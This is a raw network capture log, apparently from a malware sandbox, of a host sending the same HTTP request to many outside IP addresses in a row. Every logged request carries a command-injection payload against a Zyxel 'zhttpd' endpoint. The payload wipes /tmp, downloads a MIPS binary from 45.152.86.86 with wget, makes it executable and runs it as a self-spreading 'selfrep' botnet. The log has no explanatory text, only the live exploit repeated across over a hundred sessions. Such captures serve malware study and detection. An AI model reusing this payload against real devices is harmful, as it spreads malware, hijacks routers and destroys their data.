                              Mar 31, 2024 08:41:08.546427965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1250192.168.2.1353910188.54.12.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546468019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1251192.168.2.133927299.227.236.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546502113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1252192.168.2.1346380161.183.232.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546530962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1253192.168.2.1343174179.149.188.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546567917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1254192.168.2.1360324180.8.33.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546614885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1255192.168.2.1345508157.230.200.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546634912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1256192.168.2.135780451.131.116.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546673059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1257192.168.2.1340026173.150.47.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546694040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1258192.168.2.134579080.132.184.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546727896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1259192.168.2.1338876171.75.7.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546788931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1260192.168.2.1344734122.181.90.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546838999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1261192.168.2.1356064198.138.63.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546870947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1262192.168.2.1334982113.0.167.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546919107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1263192.168.2.1349486155.31.142.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546952009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1264192.168.2.1360204136.34.0.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.546983004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1265192.168.2.135366424.231.248.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.547019958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1266192.168.2.1358230194.160.186.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.547059059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1267192.168.2.1339222149.42.226.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.547115088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1268192.168.2.135743062.201.107.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.547147036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1269192.168.2.134896877.244.35.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.547200918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1270192.168.2.133644024.17.168.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.547261953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1271192.168.2.1355100176.109.62.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.550764084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1272192.168.2.134426884.45.29.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.550792933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1273192.168.2.134036297.43.197.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.550820112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1274192.168.2.1358144112.50.206.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.550858021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1275192.168.2.1345854159.179.104.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.550898075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1276192.168.2.135930893.199.18.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.550968885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1277192.168.2.1337518167.9.186.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.550998926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1278192.168.2.133740868.57.125.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.551037073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1279192.168.2.134127241.103.248.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.551060915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1280192.168.2.134349241.238.230.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.551076889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1281192.168.2.135068434.133.223.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.551136017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1282192.168.2.134407094.148.73.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.551183939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1283192.168.2.134896464.200.46.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.551198959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1284192.168.2.134698651.223.235.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563127041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1285192.168.2.13552342.173.121.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563174009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1286192.168.2.1358378159.220.233.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563239098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1287192.168.2.1342264186.25.1.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563287973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1288192.168.2.1351486220.58.82.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563347101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1289192.168.2.134845440.149.246.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563412905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1290192.168.2.134523887.149.214.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563466072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1291192.168.2.134430423.96.83.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563519001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1292192.168.2.1343646130.223.189.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563580036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1293192.168.2.1344344208.247.70.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563657045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1294192.168.2.135210269.46.197.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563705921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1295192.168.2.1339754109.22.164.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563741922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1296192.168.2.1351542135.126.93.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563807964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1297192.168.2.134170040.178.238.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563837051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1298192.168.2.1347594103.206.88.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563893080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1299192.168.2.134211099.184.230.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.563936949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1300192.168.2.1337436201.183.199.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564002037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1301192.168.2.1356302222.16.246.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564048052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1302192.168.2.1338708110.228.219.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564116001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1303192.168.2.134901013.124.184.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564168930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1304192.168.2.134810414.120.69.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564230919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1305192.168.2.1360004124.2.240.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564276934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1306192.168.2.1350292129.60.177.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564340115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1307192.168.2.1349236155.1.190.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564398050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1308192.168.2.1356396154.171.18.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564409018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1309192.168.2.135250688.58.202.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564477921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1310192.168.2.133542239.0.96.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564532995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1311192.168.2.1341934130.169.15.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564583063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1312192.168.2.1355690100.150.115.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564630985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1313192.168.2.13553621.38.70.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564687967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1314192.168.2.134005453.67.200.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564747095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1315192.168.2.1334684103.118.91.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564815998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1316192.168.2.1335076149.41.82.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564871073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1317192.168.2.134977881.254.196.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.564922094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1318192.168.2.134991848.102.132.164443
                              TimestampBytes transferredDirectionData
